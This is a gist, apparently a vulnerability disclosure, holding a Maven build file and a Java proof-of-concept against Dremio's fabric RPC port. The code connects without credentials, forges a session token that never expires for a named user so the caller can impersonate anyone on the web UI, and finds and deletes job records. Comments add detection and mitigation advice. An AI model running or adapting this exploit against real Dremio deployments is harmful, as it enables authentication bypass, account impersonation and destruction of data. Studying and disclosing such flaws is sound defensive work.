Dremio Fabric Security Issue
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Build file for the SecurityRunner harness shown in this gist. It pulls in the Dremio
  modules the harness compiles against and pins every one of them to the same Dremio
  build identifier, so the client-side classes match the server build under test.
  Bump all five versions together; a mixed set of builds is not something this harness
  is known to work with.
-->
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.micron.dremio</groupId>
  <artifactId>security-test</artifactId>
  <version>1.0-SNAPSHOT</version>
  <dependencies>
    <!-- Common config / allocator / class-path scanner used to bootstrap the client. -->
    <dependency>
      <groupId>com.dremio</groupId>
      <artifactId>dremio-common</artifactId>
      <version>4.0.0-201909121834570395-c7a5071</version>
    </dependency>
    <!-- Fabric RPC layer: the transport the harness connects to the coordinator over. -->
    <dependency>
      <groupId>com.dremio.services</groupId>
      <artifactId>dremio-services-fabric-rpc</artifactId>
      <version>4.0.0-201909121834570395-c7a5071</version>
    </dependency>
    <dependency>
      <groupId>com.dremio.services</groupId>
      <artifactId>dremio-services-namespace</artifactId>
      <version>4.0.0-201909121834570395-c7a5071</version>
    </dependency>
    <!-- KV store API and the remote provider the harness reads/writes stores through. -->
    <dependency>
      <groupId>com.dremio.services</groupId>
      <artifactId>dremio-services-datastore</artifactId>
      <version>4.0.0-201909121834570395-c7a5071</version>
    </dependency>
    <!-- Web tier backend: supplies the token store creator and SessionState model. -->
    <dependency>
      <groupId>com.dremio</groupId>
      <artifactId>dremio-dac-backend</artifactId>
      <version>4.0.0-201909121834570395-c7a5071</version>
    </dependency>
  </dependencies>
  <build>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <!-- The harness uses lambdas, so Java 8 is the minimum source/target level. -->
        <configuration>
          <source>1.8</source>
          <target>1.8</target>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
package com.dremio.services.fabric; | |
import com.dremio.common.VM; | |
import com.dremio.common.config.SabotConfig; | |
import com.dremio.common.memory.DremioRootAllocator; | |
import com.dremio.common.scanner.ClassPathScanner; | |
import com.dremio.common.scanner.persistence.ScanResult; | |
import com.dremio.dac.proto.model.tokens.SessionState; | |
import com.dremio.dac.server.tokens.TokenStoreCreator; | |
import com.dremio.datastore.IndexedStore; | |
import com.dremio.datastore.KVStore; | |
import com.dremio.datastore.RemoteKVStoreProvider; | |
import com.dremio.datastore.SearchQueryUtils; | |
import com.dremio.exec.proto.CoordinationProtos; | |
import com.dremio.exec.rpc.CloseableThreadPool; | |
import com.dremio.service.job.proto.JobId; | |
import com.dremio.service.job.proto.JobResult; | |
import com.dremio.service.jobs.LocalJobsService; | |
import com.dremio.services.fabric.api.FabricService; | |
import org.apache.arrow.memory.BufferAllocator; | |
import java.math.BigInteger; | |
import java.security.SecureRandom; | |
import java.util.Map; | |
/**
 * Harness that reproduces the issue described by this gist: it connects to a Dremio
 * coordinator's fabric port as a {@link RemoteKVStoreProvider} client and then reads
 * and writes coordinator-side KV stores directly.
 *
 * <p>What the code below establishes, and why it matters to a defender:
 * <ul>
 *   <li>The only connection inputs are a hostname (see {@link #getMasterEndpoint()}) and
 *       the fabric port. No credential, token or certificate is supplied anywhere in this
 *       class, so whatever the fabric layer accepts at the network level is what the
 *       stores below are exposed with.</li>
 *   <li>Example 1 writes a {@link SessionState} straight into the web-tier token store,
 *       i.e. the data the UI trusts to authenticate a session.</li>
 *   <li>Example 2 enumerates and deletes entries from the jobs store.</li>
 * </ul>
 *
 * <p>The risk is therefore network reachability of the fabric port by anything other than
 * trusted cluster nodes; restricting that port is the first mitigation, and whether the RPC
 * layer authenticates peers at all is the question to verify against the server code (not
 * determinable from this file).
 */
public class SecurityRunner {
    // Class-path scan result the KV store provider needs to resolve store creators.
    // NOTE(review): not declared final although it is never reassigned.
    private static ScanResult PRESCANNED = ClassPathScanner.fromPrescan(SabotConfig.create());
    // Thread pool handed to the fabric service; never closed in main (acceptable for a
    // one-shot harness, but it will keep the JVM alive if main is reused elsewhere).
    private static final CloseableThreadPool pool = new CloseableThreadPool("dremio-security-test");
    // Direct-memory allocators for Arrow buffers used by the RPC layer. Neither is closed
    // in main either, so leak accounting at shutdown is not exercised here.
    private static final DremioRootAllocator rootAllocator =
        DremioRootAllocator.create(VM.getMaxDirectMemory(), Long.MAX_VALUE);
    private static final BufferAllocator allocator = rootAllocator.newChildAllocator("child-allocator", 0, Long.MAX_VALUE);

    /**
     * Entry point: starts a local fabric endpoint, opens a remote KV store provider
     * against the coordinator returned by {@link #getMasterEndpoint()}, runs the two
     * examples, and closes the provider and the fabric service.
     *
     * @param args ignored
     * @throws Exception propagated from service start/stop and store access
     */
    public static void main(String[] args) throws Exception {
        // Local fabric endpoint this client listens on. The positional arguments (the boolean
        // flag and the numeric limits) are not documented here; see FabricServiceImpl for
        // their meaning before changing them.
        final FabricService fabricService = new FabricServiceImpl("localhost", 45678, true,
            2, allocator, 0, Long.MAX_VALUE, 0, pool);
        fabricService.start();
        // Take the easy way out and just use the RemoteKVStoreProvider
        // The provider only needs the master endpoint, the fabric service and an allocator;
        // note the absence of any authentication material in this argument list.
        final RemoteKVStoreProvider remoteKVStoreProvider =
            new RemoteKVStoreProvider(PRESCANNED,
                () -> getMasterEndpoint(),
                () -> fabricService,
                allocator,
                "localhost");
        remoteKVStoreProvider.start();
        // Ex 1: Lets create a token for logging into the website by directly inserting a token into the Token Store
        // Conveniently this token "never" expires
        // NOTE: I tested this locally, and was able to put in the JSON into the "Local Storage" for the webpage
        // Using Chrome Developer tools and impersonate anyone I want.
        // NOTE 2: In the case of SimpleAuthentication, I could just create a new account and login too.
        // NOTE(review): the write below succeeds without this class ever presenting a
        // credential. For detection, an entry whose expiresAt is Long.MAX_VALUE (and whose
        // issuedAt is not paired with a login audit event) is a useful signal for a session
        // that was written to the store directly rather than issued by the login path —
        // confirm against how the login code populates SessionState.
        {
            KVStore<String, SessionState> tokenStore = remoteKVStoreProvider.getStore(TokenStoreCreator.class);
            // 130 random bits from SecureRandom, rendered in base 32, as the token key.
            final String token = new BigInteger(130, new SecureRandom()).toString(32);
            final SessionState state = new SessionState()
                .setUsername("pwicks")
                .setClientAddress("localhost")
                .setIssuedAt(System.currentTimeMillis())
                .setExpiresAt(Long.MAX_VALUE);
            tokenStore.put(token, state);
            System.out.println("Token: " + token + ", Session: " + state);
        }
        // Ex 2: Lets find/delete some jobs
        // Destructive: the loop deletes every entry it prints (at most two, per setLimit).
        // Only meaningful against a disposable test coordinator.
        {
            final IndexedStore<JobId, JobResult> store = remoteKVStoreProvider.getStore(LocalJobsService.JobsStoreCreator.class);
            // Match-all query capped at two results; no filter on owner or state.
            final IndexedStore.FindByCondition condition = new IndexedStore.FindByCondition()
                .setCondition(SearchQueryUtils.newMatchAllQuery())
                .setLimit(2);
            final Iterable<Map.Entry<JobId, JobResult>> entries = store.find(condition);
            for (Map.Entry<JobId, JobResult> e : entries) {
                System.out.println(e.getKey().toString() + " - " + e.getValue().toString());
                // Delete the job
                store.delete(e.getKey());
                System.out.println("Deleted Job with ID: " + e.getKey().toString());
            }
        }
        // Provider first, then the fabric service it was built on. pool and the allocators
        // stay open (see the field comments).
        remoteKVStoreProvider.close();
        fabricService.close();
    }

    /**
     * Builds the coordinator endpoint the KV store provider connects to.
     *
     * <p>{@code "!HOSTNAME_HERE!"} is a placeholder and must be replaced with the
     * coordinator's hostname before the harness can connect. The port is hard-coded to
     * the same value as the local fabric port in {@link #main(String[])}; the two are
     * independent settings and only happen to coincide here.
     *
     * @return a {@link CoordinationProtos.NodeEndpoint} with the address and fabric port set
     */
    public static CoordinationProtos.NodeEndpoint getMasterEndpoint(){
        return CoordinationProtos.NodeEndpoint.newBuilder()
            .setAddress("!HOSTNAME_HERE!")
            .setFabricPort(45678)
            .build();
    }
}